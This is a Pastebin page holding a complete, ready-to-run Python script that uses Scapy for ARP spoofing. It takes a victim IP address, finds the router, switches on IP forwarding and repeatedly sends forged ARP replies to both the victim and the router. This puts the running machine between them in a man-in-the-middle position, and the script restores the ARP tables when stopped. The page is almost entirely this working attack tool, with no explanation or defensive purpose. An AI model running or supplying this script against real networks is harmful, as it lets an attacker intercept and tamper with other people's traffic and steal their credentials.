SHARE
TWEET

Arp spoofing

JSchmoe Mar 10th, 2016 353 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. import logging
  3. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  4. from scapy.all import *
  5. import argparse
  6. import signal
  7. import sys
  8. import time
  9. try:
  10.     nonetinfo = False
  11.     from netinfo import get_routes
  12. except ImportError:
  13.     print("Install netinfo for automatic gateway detection")
  14.     nonetinfo = True
  15. import threading
  16.  
  17. conf.iface = "wlan0"
  18.  
  19. def parse_args():
  20.     parser = argparse.ArgumentParser()
  21.     parser.add_argument("victimIP", help="victim IP address")
  22.     parser.add_argument("-r", "--routerIP", help="router IP address")
  23.     return parser.parse_args()
  24.    
  25. def origMAC(ip):
  26.     ans, unans = sr(ARP(pdst=ip), timeout=5, retry=3, verbose=0)
  27.     for s, r in ans:
  28.         return r[ARP].hwsrc
  29.        
  30. def poison(routerIP, victimIP, routerMAC, victimMAC):
  31.     send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC), verbose=0)
  32.     send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC), verbose=0)
  33.    
  34. def restore(routerIP, victimIP, routerMAC, victimMAC):
  35.     send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3, verbose=0)
  36.     send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3, verbose=0)
  37.     with open("/proc/sys/net/ipv4/ip_forward", "w") as ipf:
  38.         ipf.write("0\n")
  39.     print("\n")
  40.     sys.exit()
  41.    
  42. def main(args):
  43.     victimIP = None
  44.     routerIP = None
  45.     if not args.routerIP and not nonetinfo:
  46.         for route in get_routes():
  47.             routerIP = route['gateway']
  48.             break
  49.     else:
  50.         routerIP = args.routerIP
  51.     victimIP = args.victimIP
  52.    
  53.     if not victimIP:
  54.         sys.exit("Missing victim IP.")
  55.     if not routerIP:
  56.         sys.exit("Missing router IP.")
  57.    
  58.     routerMAC = origMAC(routerIP)
  59.     victimMAC = origMAC(victimIP)
  60.    
  61.     if routerMAC == None:
  62.         sys.exit("Could not find router MAC")
  63.     if victimMAC == None:
  64.         sys.exit("Could not find victim MAC")
  65.    
  66.     print("Victim IP is:  "+victimIP)
  67.     print("Router IP is:  "+routerIP)
  68.     print("Victim MAC is: "+victimMAC)
  69.     print("Router MAC is: "+routerMAC)
  70.    
  71.     with open("/proc/sys/net/ipv4/ip_forward", "w") as ipf:
  72.         ipf.write("1\n")
  73.        
  74.     while True:
  75.         try:
  76.             poison(routerIP, victimIP, routerMAC, victimMAC)
  77.             time.sleep(1.5)
  78.         except KeyboardInterrupt:
  79.             restore(routerIP, victimIP, routerMAC, victimMAC)
  80.        
  81. if __name__ == "__main__":
  82.     main(parse_args())
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top